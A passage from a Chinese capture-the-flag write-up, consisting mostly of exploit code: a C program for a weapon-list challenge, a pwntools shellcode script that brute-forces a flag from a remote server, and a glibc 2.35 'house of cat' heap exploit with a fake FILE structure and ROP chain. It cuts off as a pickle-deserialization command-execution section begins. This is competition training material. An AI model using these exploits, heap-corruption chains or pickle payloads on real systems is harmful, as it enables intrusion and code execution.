{weaponlist[0]=0;} void newweapon89(int num) {weaponlist[0]=0;} void newweapon90(int num) {weaponlist[0]=0;} void newweapon91(int num) {weaponlist[0]=0;} void newweapon92(int num) {weaponlist[0]=0;} void newweapon93(int num) {weaponlist[0]=0;} void newweapon94(int num) {weaponlist[0]=0;} void newweapon95(int num) {weaponlist[0]=0;} void newweapon96(int num) {weaponlist[0]=0;} void newweapon97(int num) {weaponlist[0]=0;} void newweapon98(int num) {weaponlist[0]=0;} void newweapon99(int num) {weaponlist[0]=0;} void newweapon100(int num) {weaponlist[0]=0;} void newweapon101(int num) {weaponlist[0]=0;} void newweapon102(int num) {weaponlist[0]=0;} void newweapon103(int num) {weaponlist[0]=0;} void newweapon104(int num) {weaponlist[0]=0;} void newweapon105(int num) {weaponlist[0]=0;} void newweapon106(int num) {weaponlist[0]=0;} void newweapon107(int num) {weaponlist[0]=0;} void newweapon108(int num) {weaponlist[0]=0;} void newweapon109(int num) {weaponlist[0]=0;} void newweapon110(int num) {weaponlist[0]=0;} void newweapon111(int num) {weaponlist[0]=0;} void newweapon112(int num) {weaponlist[0]=0;} void newweapon113(int num) {weaponlist[0]=0;} void newweapon114(int num) {weaponlist[0]=0;} void newweapon115(int num) {weaponlist[0]=0;} void newweapon116(int num) {weaponlist[0]=0;} void newweapon117(int num) {weaponlist[0]=0;} void newweapon118(int num) {weaponlist[0]=0;} void newweapon119(int num) {weaponlist[0]=0;} void newweapon120(int num) {weaponlist[0]=0;} void newweapon121(int num) {weaponlist[0]=0;} void newweapon122(int num) {weaponlist[0]=0;} void newweapon123(int num) {weaponlist[0]=0;} void newweapon124(int num) {weaponlist[0]=0;} void newweapon125(int num) {weaponlist[0]=0;} void newweapon126(int num) {weaponlist[0]=0;} void newweapon127(int num) {weaponlist[0]=0;} void newweapon128(int num) {weaponlist[0]=0;} void newweapon129(int num) {weaponlist[0]=0;} void newweapon130(int num) {weaponlist[0]=0;} void newweapon131(int num) {weaponlist[0]=0;} void newweapon132(int num) {weaponlist[0]=0;} void newweapon133(int num) {weaponlist[0]=0;} void newweapon134(int num) {weaponlist[0]=0;} void newweapon135(int num) {weaponlist[0]=0;} void newweapon136(int num) {weaponlist[0]=0;} void newweapon137(int num) {weaponlist[0]=0;} void newweapon138(int num) {weaponlist[0]=0;} void newweapon139(int num) {weaponlist[0]=0;} void newweapon140(int num) {weaponlist[0]=0;} void newweapon141(int num) {weaponlist[0]=0;} void newweapon142(int num) {weaponlist[0]=0;} void newweapon143(int num) {weaponlist[0]=0;} void newweapon144(int num) {weaponlist[0]=0;} void newweapon145(int num) {weaponlist[0]=0;} void newweapon146(int num) {weaponlist[0]=0;} void newweapon147(int num) {weaponlist[0]=0;} void newweapon148(int num) {weaponlist[0]=0;} void newweapon149(int num) {weaponlist[0]=0;} void newweapon150(int num) {weaponlist[0]=0;} void newweapon151(int num) {weaponlist[0]=0;} void newweapon152(int num) {weaponlist[0]=0;} void newweapon153(int num) {weaponlist[0]=0;} void newweapon154(int num) {weaponlist[0]=0;} void newweapon155(int num) {weaponlist[0]=0;} void newweapon156(int num) {weaponlist[0]=0;} void newweapon157(int num) {weaponlist[0]=0;} void newweapon158(int num) {weaponlist[0]=0;} void newweapon159(int num) {weaponlist[0]=0;} void newweapon160(int num) {weaponlist[0]=0;} void newweapon161(int num) {weaponlist[0]=0;} void newweapon162(int num) {weaponlist[0]=0;} void newweapon163(int num) {weaponlist[0]=0;} void newweapon164(int num) {weaponlist[0]=0;} void newweapon165(int num) {weaponlist[0]=0;} void newweapon166(int num) {weaponlist[0]=0;} void newweapon167(int num) {weaponlist[0]=0;} void newweapon168(int num) {weaponlist[0]=0;} void newweapon169(int num) {weaponlist[0]=0;} void newweapon170(int num) {weaponlist[0]=0;} void newweapon171(int num) {weaponlist[0]=0;} void newweapon172(int num) {weaponlist[0]=0;} void newweapon173(int num) {weaponlist[0]=0;} void newweapon174(int num) {weaponlist[0]=0;} void newweapon175(int num) {weaponlist[0]=0;} void newweapon176(int num) {weaponlist[0]=0;} void newweapon177(int num) {weaponlist[0]=0;} void newweapon178(int num) {weaponlist[0]=0;} void newweapon179(int num) {weaponlist[0]=0;} void newweapon180(int num) {weaponlist[0]=0;} void newweapon181(int num) {weaponlist[0]=0;} void newweapon182(int num) {weaponlist[0]=0;} void newweapon183(int num) {weaponlist[0]=0;} void newweapon184(int num) {weaponlist[0]=0;} void newweapon185(int num) {weaponlist[0]=0;} void newweapon186(int num) {weaponlist[0]=0;} void newweapon187(int num) {weaponlist[0]=0;} void newweapon188(int num) {weaponlist[0]=0;} void newweapon189(int num) {weaponlist[0]=0;} void newweapon190(int num) {weaponlist[0]=0;} void newweapon191(int num) {weaponlist[0]=0;} void newweapon192(int num) {weaponlist[0]=0;} void newweapon193(int num) {weaponlist[0]=0;} void newweapon194(int num) {weaponlist[0]=0;} void newweapon195(int num) {weaponlist[0]=0;} void newweapon196(int num) {weaponlist[0]=0;} void newweapon197(int num) {weaponlist[0]=0;} void newweapon198(int num) {weaponlist[0]=0;} void newweapon199(int num) {weaponlist[0]=0;} void newweapon200(int num) {weaponlist[0]=0;} void newweapon201(int num) {weaponlist[0]=0;} void newweapon202(int num) {weaponlist[0]=0;} void newweapon203(int num) {weaponlist[0]=0;} void newweapon204(int num) {weaponlist[0]=0;} void newweapon205(int num) {weaponlist[0]=0;} void newweapon206(int num) {weaponlist[0]=0;} void newweapon207(int num) {weaponlist[0]=0;} void newweapon208(int num) {weaponlist[0]=0;} void newweapon209(int num) {weaponlist[0]=0;} void newweapon210(int num) {weaponlist[0]=0;} void newweapon211(int num) {weaponlist[0]=0;} void newweapon212(int num) {weaponlist[0]=0;} void newweapon213(int num) {weaponlist[0]=0;} void newweapon214(int num) {weaponlist[0]=0;} void newweapon215(int num) {weaponlist[0]=0;} void newweapon216(int num) {weaponlist[0]=0;} void newweapon217(int num) {weaponlist[0]=0;} void newweapon218(int num) {weaponlist[0]=0;} void newweapon219(int num) {weaponlist[0]=0;} void newweapon220(int num) {weaponlist[0]=0;} void newweapon221(int num) {weaponlist[0]=0;} void newweapon222(int num) {weaponlist[0]=0;} void newweapon223(int num) {weaponlist[0]=0;} void newweapon224(int num) {weaponlist[0]=0;} void newweapon225(int num) {weaponlist[0]=0;} void newweapon226(int num) {weaponlist[0]=0;} void newweapon227(int num) {weaponlist[0]=0;} void newweapon228(int num) {weaponlist[0]=0;} void newweapon229(int num) {weaponlist[0]=0;} void newweapon230(int num) {weaponlist[0]=0;} void newweapon231(int num) {weaponlist[0]=0;} void newweapon232(int num) {weaponlist[0]=0;} void newweapon233(int num) {weaponlist[0]=0;} void newweapon234(int num) {weaponlist[0]=0;} void newweapon235(int num) {weaponlist[0]=0;} void newweapon236(int num) {weaponlist[0]=0;} void newweapon237(int num) {weaponlist[0]=0;} void newweapon238(int num) {weaponlist[0]=0;} void newweapon239(int num) {weaponlist[0]=0;} void newweapon240(int num) {weaponlist[0]=0;} void newweapon241(int num) {weaponlist[0]=0;} void newweapon242(int num) {weaponlist[0]=0;} void newweapon243(int num) {weaponlist[0]=0;} void newweapon244(int num) {weaponlist[0]=0;} void newweapon245(int num) {weaponlist[0]=0;} void newweapon246(int num) {weaponlist[0]=0;} void newweapon247(int num) {weaponlist[0]=0;} void newweapon248(int num) {weaponlist[0]=0;} void newweapon249(int num) {weaponlist[0]=0;} void newweapon250(int num) {weaponlist[0]=0;} void newweapon251(int num) {weaponlist[0]=0;} void newweapon252(int num) {weaponlist[0]=0;} void newweapon253(int num) {weaponlist[0]=0;} void newweapon254(int num) {weaponlist[0]=0;} void newweapon255(int num) {weaponlist[0]=0;} void newweapon256(int num) {weaponlist[0]=0;} void newweapon257(int num) {weaponlist[0]=0;} void newweapon258(int num) {weaponlist[0]=0;} void newweapon259(int num) {weaponlist[0]=0;} void newweapon260(int num) {weaponlist[0]=0;} void newweapon261(int num) {weaponlist[0]=0;} void newweapon262(int num) {weaponlist[0]=0;} void newweapon263(int num) {weaponlist[0]=0;} void newweapon264(int num) {weaponlist[0]=0;} void newweapon265(int num) {weaponlist[0]=0;} void newweapon266(int num) {weaponlist[0]=0;} void newweapon267(int num) {weaponlist[0]=0;} void newweapon268(int num) {weaponlist[0]=0;} void newweapon269(int num) {weaponlist[0]=0;} void newweapon270(int num) {weaponlist[0]=0;} void newweapon271(int num) {weaponlist[0]=0;} void newweapon272(int num) {weaponlist[0]=0;} void newweapon273(int num) {weaponlist[0]=0;} void newweapon274(int num) {weaponlist[0]=0;} void newweapon275(int num) {weaponlist[0]=0;} void newweapon276(int num) {weaponlist[0]=0;} void newweapon277(int num) {weaponlist[0]=0;} void newweapon278(int num) {weaponlist[0]=0;} void newweapon279(int num) {weaponlist[0]=0;} void newweapon280(int num) {weaponlist[0]=0;} void newweapon281(int num) {weaponlist[0]=0;} void newweapon282(int num) {weaponlist[0]=0;} void newweapon283(int num) {weaponlist[0]=0;} void newweapon284(int num) {weaponlist[0]=0;} void newweapon285(int num) {weaponlist[0]=0;} void newweapon286(int num) {weaponlist[0]=0;} void newweapon287(int num) {weaponlist[0]=0;} void newweapon288(int num) {weaponlist[0]=0;} void newweapon289(int num) {weaponlist[0]=0;} void newweapon290(int num) {weaponlist[0]=0;} void newweapon291(int num) {weaponlist[0]=0;} void newweapon292(int num) {weaponlist[0]=0;} void newweapon293(int num) {weaponlist[0]=0;} void newweapon294(int num) {weaponlist[0]=0;} void newweapon295(int num) {weaponlist[0]=0;} void newweapon296(int num) {weaponlist[0]=0;} void newweapon297(int num) {weaponlist[0]=0;} void newweapon298(int num) {weaponlist[0]=0;} void newweapon299(int num) {weaponlist[0]=0;} void newweapon300(int num) {weaponlist[0]=0;} void newweapon301(int num) {weaponlist[0]=0;} void newweapon302(int num) {weaponlist[0]=0;} void newweapon303(int num) {weaponlist[0]=0;} void newweapon304(int num) {weaponlist[0]=0;} void newweapon305(int num) {weaponlist[0]=0;} void newweapon306(int num) {weaponlist[0]=0;} void newweapon307(int num) {weaponlist[0]=0;} void newweapon308(int num) {weaponlist[0]=0;} void newweapon309(int num) {weaponlist[0]=0;} void newweapon310(int num) {weaponlist[0]=0;} void newweapon311(int num) {weaponlist[0]=0;} void newweapon312(int num) {weaponlist[0]=0;} void newweapon313(int num) {weaponlist[0]=0;} void newweapon314(int num) {weaponlist[0]=0;} void newweapon315(int num) {weaponlist[0]=0;} void newweapon316(int num) {weaponlist[0]=0;} void newweapon317(int num) {weaponlist[0]=0;} void newweapon318(int num) {weaponlist[0]=0;} void newweapon319(int num) {weaponlist[0]=0;} void newweapon320(int num) {weaponlist[0]=0;} void newweapon321(int num) {weaponlist[0]=0;} void newweapon322(int num) {weaponlist[0]=0;} void newweapon323(int num) {weaponlist[0]=0;} void newweapon324(int num) {weaponlist[0]=0;} void newweapon325(int num) {weaponlist[0]=0;} void newweapon326(int num) {weaponlist[0]=0;} void newweapon327(int num) {weaponlist[0]=0;} void newweapon328(int num) {weaponlist[0]=0;} void newweapon329(int num) {weaponlist[0]=0;} void newweapon330(int num) {weaponlist[0]=0;} void newweapon331(int num) {weaponlist[0]=0;} void newweapon332(int num) {weaponlist[0]=0;} void newweapon333(int num) {weaponlist[0]=0;} void newweapon334(int num) {weaponlist[0]=0;} void newweapon335(int num) {weaponlist[0]=0;} void newweapon336(int num) {weaponlist[0]=0;} void newweapon337(int num) {weaponlist[0]=0;} void newweapon338(int num) {weaponlist[0]=0;} void newweapon339(int num) {weaponlist[0]=0;} void newweapon340(int num) {weaponlist[0]=0;} void newweapon341(int num) {weaponlist[0]=0;} void newweapon342(int num) {weaponlist[0]=0;} void newweapon343(int num) {weaponlist[0]=0;} void newweapon344(int num) {weaponlist[0]=0;} void newweapon345(int num) {weaponlist[0]=0;} void newweapon346(int num) {weaponlist[0]=0;} void newweapon347(int num) {weaponlist[0]=0;} void newweapon348(int num) {weaponlist[0]=0;} void newweapon349(int num) {weaponlist[0]=0;} void newweapon350(int num) {weaponlist[0]=0;} void newweapon351(int num) {weaponlist[0]=0;} void newweapon352(int num) {weaponlist[0]=0;} void newweapon353(int num) {weaponlist[0]=0;} void newweapon354(int num) {weaponlist[0]=0;} void newweapon355(int num) {weaponlist[0]=0;} void newweapon356(int num) {weaponlist[0]=0;} void newweapon357(int num) {weaponlist[0]=0;} void newweapon358(int num) {weaponlist[0]=0;} void newweapon359(int num) {weaponlist[0]=0;} void newweapon360(int num) {weaponlist[0]=0;} void newweapon361(int num) {weaponlist[0]=0;} void newweapon362(int num) {weaponlist[0]=0;} void newweapon363(int num) {weaponlist[0]=0;} void newweapon364(int num) {weaponlist[0]=0;} void newweapon365(int num) {weaponlist[0]=0;} void newweapon366(int num) {weaponlist[0]=0;} void newweapon367(int num) {weaponlist[0]=0;} void newweapon368(int num) {weaponlist[0]=0;} void newweapon369(int num) {weaponlist[0]=0;} void newweapon370(int num) {weaponlist[0]=0;} void newweapon371(int num) {weaponlist[0]=0;} void newweapon372(int num) {weaponlist[0]=0;} void newweapon373(int num) {weaponlist[0]=0;} void newweapon374(int num) {weaponlist[0]=0;} void newweapon375(int num) {weaponlist[0]=0;} void newweapon376(int num) {weaponlist[0]=0;} void newweapon377(int num) {weaponlist[0]=0;} void newweapon378(int num) {weaponlist[0]=0;} void newweapon379(int num) {weaponlist[0]=0;} void newweapon380(int num) {weaponlist[0]=0;} void newweapon381(int num) {weaponlist[0]=0;} void newweapon382(int num) {weaponlist[0]=0;} void newweapon383(int num) {weaponlist[0]=0;} void newweapon384(int num) {weaponlist[0]=0;} void newweapon385(int num) {weaponlist[0]=0;} void newweapon386(int num) {weaponlist[0]=0;} void newweapon387(int num) {weaponlist[0]=0;} void newweapon388(int num) {weaponlist[0]=0;} void newweapon389(int num) {weaponlist[0]=0;} void newweapon390(int num) {weaponlist[0]=0;} void newweapon391(int num) {weaponlist[0]=0;} void newweapon392(int num) {weaponlist[0]=0;} void newweapon393(int num) {weaponlist[0]=0;} void newweapon394(int num) {weaponlist[0]=0;} void newweapon395(int num) {weaponlist[0]=0;} void newweapon396(int num) {weaponlist[0]=0;} void newweapon397(int num) {weaponlist[0]=0;} void newweapon398(int num) {weaponlist[0]=0;} void newweapon399(int num) {weaponlist[0]=0;} void gamestart(){ newweapon0(115); newweapon1(115); newweapon2(115); newweapon3(115); newweapon4(115); newweapon5(115); newweapon6(115); newweapon7(115); newweapon8(115); newweapon9(115); newweapon10(115); newweapon11(115); newweapon12(115); newweapon13(115); newweapon14(115); newweapon15(115); newweapon16(115); newweapon17(115); newweapon18(115); newweapon19(115); newweapon20(115); newweapon21(115); newweapon22(115); newweapon23(115); newweapon24(115); newweapon25(115); newweapon26(115); newweapon27(115); newweapon28(115); newweapon29(115); newweapon30(115); newweapon31(0); //446972 newweapon32(0); newweapon33(115); newweapon34(115); newweapon35(115); newweapon36(115); newweapon37(115); newweapon38(115); newweapon39(115); newweapon40(115); newweapon41(115); newweapon42(115); newweapon43(115); newweapon44(115); newweapon45(115); newweapon46(115); newweapon47(115); newweapon48(115); newweapon49(115); newweapon50(115); newweapon51(115); newweapon52(115); newweapon53(115); newweapon54(115); newweapon55(115); newweapon56(115); newweapon57(115); newweapon58(115); newweapon59(115); newweapon60(115); newweapon61(115); newweapon62(115); newweapon63(115); newweapon64(115); newweapon65(115); newweapon66(115); newweapon67(115); newweapon68(115); newweapon69(115); newweapon70(115); newweapon71(115); newweapon72(115); newweapon73(115); newweapon74(115); newweapon75(115); newweapon76(115); newweapon77(115); newweapon78(115); newweapon79(115); newweapon80(115); newweapon81(115); newweapon82(115); newweapon83(115); newweapon84(115); newweapon85(115); newweapon86(115); newweapon87(115); newweapon88(115); newweapon89(115); newweapon90(115); newweapon91(115); newweapon92(115); newweapon93(115); newweapon94(115); newweapon95(115); newweapon96(115); newweapon97(115); newweapon98(115); newweapon99(115); newweapon100(115); newweapon101(115); newweapon102(115); newweapon103(115); newweapon104(115); newweapon105(115); newweapon106(115); newweapon107(115); newweapon108(115); newweapon109(115); newweapon110(115); newweapon111(115); newweapon112(115); newweapon113(115); newweapon114(115); newweapon115(115); newweapon116(115); newweapon117(115); newweapon118(115); newweapon119(115); newweapon120(115); newweapon121(115); newweapon122(115); newweapon123(115); newweapon124(115); newweapon125(115); newweapon126(115); newweapon127(115); newweapon128(115); newweapon129(115); newweapon130(115); newweapon131(115); newweapon132(115); newweapon133(115); newweapon134(115); newweapon135(115); newweapon136(115); newweapon137(115); newweapon138(115); newweapon139(115); newweapon140(115); newweapon141(115); newweapon142(115); newweapon143(115); newweapon144(115); newweapon145(115); newweapon146(115); newweapon147(115); newweapon148(115); newweapon149(115); newweapon150(115); newweapon151(115); newweapon152(115); newweapon153(115); newweapon154(115); newweapon155(115); newweapon156(115); newweapon157(115); newweapon158(115); newweapon159(115); newweapon160(115); newweapon161(115); newweapon162(115); newweapon163(115); newweapon164(115); newweapon165(115); newweapon166(115); newweapon167(115); newweapon168(115); newweapon169(115); newweapon170(115); newweapon171(115); newweapon172(115); newweapon173(115); newweapon174(115); newweapon175(115); newweapon176(115); newweapon177(115); newweapon178(115); newweapon179(115); newweapon180(115); newweapon181(115); newweapon182(115); newweapon183(115); newweapon184(115); newweapon185(115); newweapon186(115); newweapon187(115); newweapon188(115); newweapon189(115); newweapon190(115); newweapon191(115); newweapon192(115); newweapon193(115); newweapon194(115); newweapon195(115); newweapon196(115); newweapon197(115); newweapon198(115); newweapon199(115); newweapon200(115); newweapon201(115); newweapon202(115); newweapon203(115); newweapon204(115); newweapon205(115); newweapon206(115); newweapon207(115); newweapon208(115); newweapon209(115); newweapon210(115); newweapon211(115); newweapon212(115); newweapon213(115); newweapon214(115); newweapon215(115); newweapon216(115); newweapon217(115); newweapon218(115); newweapon219(115); newweapon220(115); newweapon221(115); newweapon222(115); newweapon223(115); newweapon224(115); newweapon225(115); newweapon226(115); newweapon227(115); newweapon228(115); newweapon229(115); newweapon230(115); newweapon231(115); newweapon232(115); newweapon233(115); newweapon234(115); newweapon235(115); newweapon236(115); newweapon237(115); newweapon238(115); newweapon239(115); newweapon240(115); newweapon241(115); newweapon242(115); newweapon243(115); newweapon244(115); newweapon245(115); newweapon246(115); newweapon247(115); newweapon248(115); newweapon249(115); newweapon250(115); newweapon251(115); newweapon252(115); newweapon253(115); newweapon254(115); newweapon255(115); newweapon256(115); newweapon257(115); newweapon258(115); newweapon259(115); newweapon260(115); newweapon261(115); newweapon262(115); newweapon263(115); newweapon264(115); newweapon265(115); newweapon266(115); newweapon267(115); newweapon268(115); newweapon269(115); newweapon270(115); newweapon271(115); newweapon272(115); newweapon273(115); newweapon274(115); newweapon275(115); newweapon276(115); newweapon277(115); newweapon278(115); newweapon279(115); newweapon280(115); newweapon281(115); newweapon282(115); newweapon283(115); newweapon284(115); newweapon285(115); newweapon286(115); newweapon287(115); newweapon288(115); newweapon289(115); newweapon290(115); newweapon291(115); newweapon292(115); newweapon293(115); newweapon294(115); newweapon295(115); newweapon296(115); newweapon297(115); newweapon298(115); newweapon299(115); newweapon300(115); newweapon301(115); newweapon302(115); newweapon303(115); newweapon304(115); newweapon305(115); newweapon306(115); newweapon307(0x72); newweapon308(0x69); newweapon309(0x44); newweapon310(0); newweapon311(0); newweapon312(0); newweapon313(0); newweapon314(0x00); newweapon315(0xe0); newweapon316(0x77); //7776B0 newweapon317(0); newweapon318(0); newweapon319(0); newweapon320(0); newweapon321(0); newweapon322(115); newweapon323(115); newweapon324(115); newweapon325(115); newweapon326(115); newweapon327(115); newweapon328(115); newweapon329(115); newweapon330(115); newweapon331(115); newweapon332(115); newweapon333(115); newweapon334(115); newweapon335(115); newweapon336(115); newweapon337(115); newweapon338(115); newweapon339(115); newweapon340(115); newweapon341(115); newweapon342(115); newweapon343(115); newweapon344(115); newweapon345(115); newweapon346(115); newweapon347(115); newweapon348(115); newweapon349(115); newweapon350(115); newweapon351(115); newweapon352(115); newweapon353(115); newweapon354(115); newweapon355(115); newweapon356(115); newweapon357(115); newweapon358(115); newweapon359(115); newweapon360(115); newweapon361(115); newweapon362(115); newweapon363(115); newweapon364(115); newweapon365(115); newweapon366(115); newweapon367(115); newweapon368(115); newweapon369(115); newweapon370(115); newweapon371(115); newweapon372(115); newweapon373(115); newweapon374(115); newweapon375(115); newweapon376(115); newweapon377(115); newweapon378(115); newweapon379(115); newweapon380(115); newweapon381(115); newweapon382(115); newweapon383(115); newweapon384(115); newweapon385(115); newweapon386(115); newweapon387(115); newweapon388(115); newweapon389(115); newweapon390(115); newweapon391(115); newweapon392(115); newweapon393(115); newweapon394(115); newweapon395(115); newweapon396(115); newweapon397(115); newweapon398(115); newweapon399(115); newweapon307(115); newweapon308(115); newweapon309(115); newweapon31(115); newweapon310(115); newweapon311(115); newweapon312(115); newweapon313(115); newweapon314(0x00); newweapon315(0x00); newweapon316(0x40); newweapon317(0x00); newweapon318(0x00); newweapon319(0x00); newweapon32(0x00); newweapon320(0x00); upgrade(0x7f); fight(0); } int main ( ) { int res= fight(0); return 0; } ``` ### yakacmp 漏洞为当指令格式为`mov rx,imm`(rx是寄存器,imm是立即数且imm不为0)时会多一段汇编是 push imm,且imm是__int64类型。而push imm加上push本身字节码只需要5字节,这样imm的高4个字节可以是任意的汇编,利用这四个字节完成orw。 write系统调用被禁用所以只能爆破flag。我使用的是cmp比较,若相同则一直跳转到read,利用pwntools设置timeout判断字符是否相同。 ```python # -*- coding: utf-8 -*- from pwn import * context.terminal = ['tmux','splitw','-h'] context.arch="amd64" context.log_level="debug" import string def debug(addr=-1,PIE=True): if addr == -1: gdb.attach(p) #gdb.attach(p, "b *0x23330000\nr\n") else: if PIE: #text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).setvbuflines()[1], 16) #gdb.attach(p,'b *{}'.format(hex(text_base+addr))) gdb.attach(p,"b *$rebase({})".format(hex(addr))) else: gdb.attach(p,"b *{}".format(hex(addr))) def GO(payload): payload = payload.split('\n') p.recvuntil("me some code now") p.sendline(payload[0]) for i in range(1,len(payload)): # p.sendline(i) # p.recvuntil("operation?") p.sendlineafter("operation?", payload[i]) # if payload[i] == "mov r1,r5": # p.sendline(payload[i+1]) # i = i+1 #p.sendlineafter("operation?", "NO") #p = process("./yakacmp1") def main(idx, char): global p p = remote("59.110.212.61", 42542) #p=process("./yakacmp1") payload = "" payload += '''mov r1,{} '''.format((0x67616c66)) payload +='''mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,r1 mov r1,0\n''' #payload += '''add r1,2\n''' # mov -> 0 #payload += '''sub r1,r1\n''' payload += '''mov r1,{} '''.format((0x5e006a5f23330002)) payload += '''mov r2,{} '''.format((0x50050f5800000002)) # read(3,buf,0x100) #payload += ''' payload += '''mov r2,{} '''.format((0x5f036a5e23330002)) payload += "mov r1,0\n" payload += '''mov r2,{} '''.format((0x50050f5a00000100)) payload += '''mov r1,{} '''.format((0x595a006a23330002)&(0xffff00ffffffffff)|(idx<<(5*8))) # 00 idx #payload += "add r3,r4\n" payload += '''mov r1,{} '''.format((0x118ad10023330002)) payload += '''mov r1,{} '''.format((0x5966fa8023330002)&(0xff00ffffffffffff)|(ord(char)<<(6*8))) #66 char payload += '''mov r1,{} '''.format((0x595f407500000000)) #66 char payload += '''mov r1,{} '''.format((0x59050f5800000000)) #66 char payload += '''mov r1,{} '''.format((0x59e2ff5a233300e8)) #66 char payload += '''mov r1,{} '''.format((0x59e2ff5800000000)) #66 char #debug(0x1AF0 ) GO(payload) p.sendlineafter("operation?",'NO') sleep(1) p.send('a') p.send('a') #print(p.recv()) if __name__ == "__main__": # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False) # flag = "flag{7" # flag = "flag{79274530-bb31-" # flag = "flag{79274530-bb31-4d35-8ddf-2210" # flag = "flag{79274530-bb31-4d35-8ddf-2210c9b" flag = "" # for i in range(len(flag)): # print(i,flag[i]) # main(i,flag[i]) for idx in range(0,0x40): for char in "0123456789abcdef-_": try: main(idx, char) flag += char print(flag) #print(flag) print("-"*100) break except: p.close() print("flag:"+flag) ``` ### house of cat 2.35 add chunk的大小限制在0x418 到0x46f,不能申请到tcache大小的堆 delete后存在uaf,可以直接泄露出libc,劫持stderr, 最后堆布局一下修改top chunk size 触发malloc assert即可 ``` python from pwn import * #p = process('./cat') p = remote("47.94.166.51",35133) libc = ELF('./libc.so.6') #context.log_level = 'debug' def dbg(): gdb.attach(p) def login(): p.recv() payload = "LOGIN | r00t QWBQWXF admin" p.send(payload) def ch(cmd): p.sendlineafter('choice:\n',str(cmd)) def add(idx,size,content): payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff " p.send(payload) ch(1) p.sendlineafter('idx:\n',str(idx)) p.sendlineafter('size:\n',str(size)) p.sendafter('content:\n',str(content)) def free(idx): payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff " p.send(payload) ch(2) p.sendlineafter('idx:\n',str(idx)) def show(idx): payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff " p.send(payload) ch(3) p.sendlineafter('idx:\n',str(idx)) def edit(idx,content): payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff " p.send(payload) ch(4) p.sendlineafter('idx:\n',str(idx)) p.sendafter('content:\n',str(content)) login() add(0,0x428,'\x00'*0x30+'/flag') # p1 add(1,0x418,'B'*0x410) # g1 add(2,0x418,'CCC') # p2 add(3,0x438,'gap') # g2 free(0) add(4,0x438,'aaa') # p1 goto large free(2) show(0) p.recvuntil('Context:\n') libc_base = u64(p.recv(8)) -0x21a0d0 p.recv(8) heap_addr = u64(p.recv(8)) large_bin = libc_base + 0x21a0d0 stderr = libc_base +0x21A860 tls_dtor_list = libc_base - 0x2898 -0x80 pointer_guard = libc_base - 0x2898 + 0x8 #pointer_guard = libc_base + 0x6275e8 + 0x8 target_addr = pointer_guard-0x20 jumps = libc_base + 0x215b80 stdout = libc_base + libc.sym['_IO_2_1_stdout_'] next_chain = stdout fake_guard = heap_addr + 0x850 pop_rdi = libc_base + 0x2a3e5 pop_rsi = libc_base + 0x02be51 pop_rax_rdx_rbx = libc_base + 0x90528 pop_rax = libc_base + 0xd7b55 syscall = libc_base + 0x91396 mov_rsp_rdx = libc_base + 0x5a170 magic_gadget = libc_base + 0x1675b0 # mov rdx, qword ptr [rdi + 8]; log.success('libc_base: '+hex(libc_base)) log.info('jumps: '+hex(jumps)) log.info('heap_addr: '+hex(heap_addr)) log.info('tls addr: '+hex(tls_dtor_list)) log.info('target_addr: '+hex(target_addr)) log.info('pointer addr: '+hex(pointer_guard)) log.info('stderr_addr: '+hex(stderr)) payload = p64(large_bin)*2 + p64(heap_addr) + p64(target_addr) edit(0,payload) add(5,0x448,p64(0)) # p2 goto large #clear large bin payload = p64(large_bin)*2 + p64(heap_addr)*2 fake_file = '\x00'*0x30 fake_file += '\x00'*0x28 fake_file += p64(next_chain) # _chain fake_file += '\x00'*0x18 fake_file += p64(heap_addr) # _lock = writable address fake_file += '\x00'*0x10 fake_file += p64(heap_addr) fake_file += '\x00'*0x18 fake_file += p64(0x10000) fake_file += p64(heap_addr + 0x1da0) fake_file += '\x00'*0x8 fake_file += p64( jumps + 0x10) # vtable fake_file += p64(heap_addr + 0x1da0) + p64((magic_gadget^fake_guard)<<0x11) # rop = p64(pop_rax_rdx_rbx) rop += p64(heap_addr+0x1da0) rop += p64(heap_addr+0x1e00) # fake_rdx rop += p64(heap_addr+0x1da0) rop += p64(mov_rsp_rdx) rop += p64(mov_rsp_rdx) # rop += p64(mov_rsp_rdx) #rdx+0x20 rop += p64(mov_rsp_rdx) rop += p64(0)*4 rop += p64(pop_rax)+p64(3)+p64(pop_rdi)+p64(0)+p64(syscall) #close(0) rop += p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(heap_addr+0x40)+p64(pop_rsi)+p64(0)+p64(syscall)#open rop += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(heap_addr+0x200)+p64(pop_rax_rdx_rbx)+p64(0)+p64(0x30)+p64(0)+p64(syscall)#read rop += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(heap_addr+0x200)+p64(pop_rax_rdx_rbx)+p64(1)+p64(0x30)+p64(0)+p64(syscall)#read rop += p64(pop_rax_rdx_rbx)+p64(231)+p64(0)+p64(0)+p64(pop_rdi)+p64(0)+p64(syscall) hex(len(rop)) add(6,0x448,'666') # p1 add(7,0x438,rop ) # g1 add(8,0x438, fake_file ) # p2 add(9,0x438,'999') # g2 free(6) add(10,0x458,'\x0a\x0a\x0a') # p1 goto large free(8) show(6) p.recvuntil('Context:\n') large_bin = u64(p.recv(8)) p.recv(8) heap_addr = u64(p.recv(8)) target_addr = stderr - 0x20 log.info('heap_addr: '+hex(heap_addr)) payload = p64(large_bin)*2 + p64(heap_addr) + p64(target_addr) edit(6,payload) add(11,0x468,'\x0b\x0b\x0b') #p2 goto large add(12,0x450,p64(0)+p64(0x21)+'a'*0x10+p64(0)+p64(0x21)) # x/30gx $rebase(0x4060) free(12) free(11) free(10) add(13,0x468,'k'*0x450+p64(0)+p64(0x481) ) free(11) add(14,0x468,'aa') log.info('magic_gadget: '+hex(magic_gadget)) #dbg()# b*$rebase(0x0177F) b __vfxprintf b *__malloc_assert+78 b*__vfxprintf+76 b*fflush+192 # trigger malloc_assert payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff " p.send(payload) ch(1) p.sendlineafter('idx:\n',str(15)) p.sendlineafter('size:\n',str(0x468)) p.interactive() ``` ## web ### crash pickle反序列化 i操作码命令执行->flask sleep -> nginx 504 环境有问题 直接命令执行sleep久了环境会挂 写了个内存马命令执行sleep居然就可以了 ```python import base64 import pickletools cmd = b'''python -c 